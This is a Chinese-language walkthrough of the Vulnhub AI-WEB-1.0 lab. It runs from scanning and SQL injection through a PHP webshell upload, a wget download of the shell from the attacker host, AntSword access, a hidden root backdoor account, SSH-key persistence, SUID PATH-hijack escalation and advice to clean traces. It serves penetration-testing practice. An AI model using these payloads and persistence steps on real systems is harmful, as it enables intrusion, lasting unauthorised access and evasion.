Vulnhub靶机AI-WEB-1.0渗透测试:SQL注入到蚁剑连接的5个关键步骤
Vulnhub靶机AI-WEB-1.0渗透实战:从SQL注入到蚁剑连接的深度解析
在网络安全领域,靶机渗透测试是提升实战能力的重要途径。Vulnhub平台提供的AI-WEB-1.0靶机,以其精心设计的漏洞环境,成为学习Web应用渗透的理想选择。本文将深入剖析从发现SQL注入漏洞到最终通过蚁剑建立完整连接的完整过程,不仅展示标准操作流程,更会揭示每个环节背后的技术原理和实战技巧。
1. 环境准备与信息收集
渗透测试的第一步永远是充分的信息收集。对于AI-WEB-1.0靶机,我们需要先确定目标网络环境的基本参数。
网络环境确认:
# 使用arp-scan扫描本地网络 arp-scan -l --interface=eth0输出示例:
192.168.109.141 00:0c:29:12:34:56 VMware, Inc.确认靶机IP后,进行全面的端口扫描:
nmap -sV -T4 -p- 192.168.109.141关键发现:
- 80/tcp open http Apache httpd 2.4.29
目录扫描实战技巧:
# 使用dirsearch进行深度扫描 dirsearch -u http://192.168.109.141/ -e php,html -x 403,404 -t 50扫描结果中需要特别关注:
/m3diNf0/info.php- PHP信息页面/se3reTdir777/index.php- 可能存在注入点的页面
提示:在实际渗透中,robots.txt和常见的备份文件(如.bak, .swp)往往包含重要线索,务必检查。
2. SQL注入漏洞的深度利用
发现/se3reTdir777/index.php存在SQL注入后,我们需要系统性地利用这个漏洞获取更多信息。
手工验证注入点:
1' AND 1=1-- - # 正常返回 1' AND 1=2-- - # 无返回结果使用sqlmap自动化注入:
sqlmap -u "http://192.168.109.141/se3reTdir777/index.php" \ --data="uid=1&Operation=Submit" \ --risk=3 --level=5 \ --batch数据库信息获取流程:
| 命令参数 | 获取信息 | 示例结果 |
|---|---|---|
--dbs | 数据库列表 | aiweb1, information_schema |
-D aiweb1 --tables | 表列表 | user, systemUser |
-D aiweb1 -T user --columns | 字段列表 | id, firstName, lastName |
--dump | 表数据 | 管理员凭证等敏感信息 |
高级技巧:直接获取系统shell:
sqlmap -u "http://192.168.109.141/se3reTdir777/index.php" \ --data="uid=1&Operation=Submit" \ --os-shell --batch成功执行需要满足:
- 数据库用户具有FILE权限
- 知道Web目录绝对路径
- secure_file_priv参数未限制
3. 多种Webshell上传方法对比
获取系统访问权限的关键是上传Webshell,这里介绍三种实用方法。
方法一:直接文件写入
# 准备一句话木马 echo '<?php system($_GET["cmd"]);?>' > shell.php # 使用sqlmap写入 sqlmap -u "http://192.168.109.141/se3reTdir777/index.php" \ --file-write=shell.php \ --file-dest=/var/www/html/se3reTdir777/uploads/shell.php方法二:利用Web服务器下载
# 在Kali启动临时Web服务 python3 -m http.server 8080 # 在靶机执行下载 wget http://192.168.109.139:8080/shell.php -O /var/www/html/se3reTdir777/uploads/shell.php方法三:利用PHP特性直接生成
<?php file_put_contents('shell.php', '<?php system($_GET["cmd"]);?>');注意:实际环境中需根据目标系统配置选择最适合的方法,并注意清理痕迹。
4. 蚁剑连接与权限维持
成功上传Webshell后,使用蚁剑(AntSword)建立稳定连接。
蚁剑配置关键参数:
- URL:
http://192.168.109.141/se3reTdir777/uploads/shell.php - 连接密码:
cmd(根据使用的Webshell类型) - 编码器:
default
高级功能使用:
- 虚拟终端操作
- 文件管理
- 数据库管理
- 端口转发
权限维持技巧:
# 创建隐藏后门账户 useradd -o -u 0 -g 0 -s /bin/bash -p $(openssl passwd -1 password) backdoor # 添加SSH密钥认证 mkdir -p /root/.ssh echo "ssh-rsa AAAAB3NzaC..." >> /root/.ssh/authorized_keys5. 提权与系统深度控制
从Web权限到系统完全控制需要有效的提权手段。
常见提权方法对比:
| 方法 | 适用条件 | 风险等级 |
|---|---|---|
| SUID滥用 | 存在配置错误的SUID程序 | 中 |
| 内核漏洞 | 未打补丁的系统 | 高 |
| 服务配置错误 | 错误配置的服务权限 | 低 |
| 计划任务 | 可写的计划任务脚本 | 中 |
实战案例:利用SUID提权:
# 查找具有SUID位的程序 find / -perm -4000 2>/dev/null # 发现异常程序 /usr/bin/custom-script # 分析程序行为 ltrace /usr/bin/custom-script # 利用程序缺陷 echo '/bin/bash' > /tmp/exploit chmod +x /tmp/exploit export PATH=/tmp:$PATH /usr/bin/custom-script获取最终flag:
find / -name "*flag*" -type f 2>/dev/null cat /root/flag.txt渗透测试完成后,务必清理所有上传的文件和创建的后门账户,保持职业道德。整个过程中学到的不仅是技术操作,更重要的是理解每个漏洞产生的根本原因和防御方法。